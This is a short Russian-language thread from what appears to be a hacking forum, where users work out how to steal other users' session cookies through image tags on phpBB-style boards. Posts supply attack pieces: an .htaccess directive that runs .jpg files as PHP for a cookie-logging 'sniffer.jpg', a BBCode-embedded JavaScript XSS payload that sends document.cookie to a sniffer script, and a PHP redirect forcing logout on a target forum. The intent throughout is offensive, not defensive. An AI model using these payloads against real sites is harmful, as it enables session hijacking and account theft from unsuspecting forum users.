Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы? Это я все к уязвимости через , когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю... И вообще возможно ли это? ) Хотя я думаю, что возможно..
хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?
Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием Code: AddType application/x-httpd-php .jpg смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log.
подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?
[COLOR=[*IMG]http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="/cgi-bin/s.jpg?"+document.cookie) [/COLOR] типа что то этого ты имел ввиду? без зведочек естественно
Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в . В директории создаешь файл index.php - и он исполняется... [QUOTE]<?php header("Location: http://hosttobeexploited/phpBB/login.php?logout=true"); exit; ?>[/QUOTE] Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз.
Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом . Загружается .jpg на страничке и п...на уровне пользователя не тяжело подсказать-с
Все таки ты какал... а я предупреждал тебя... и не один раз... что нельзя тебе какать... эх... Laggi, ты конешно молодец... додумался хорошо, но это не работает...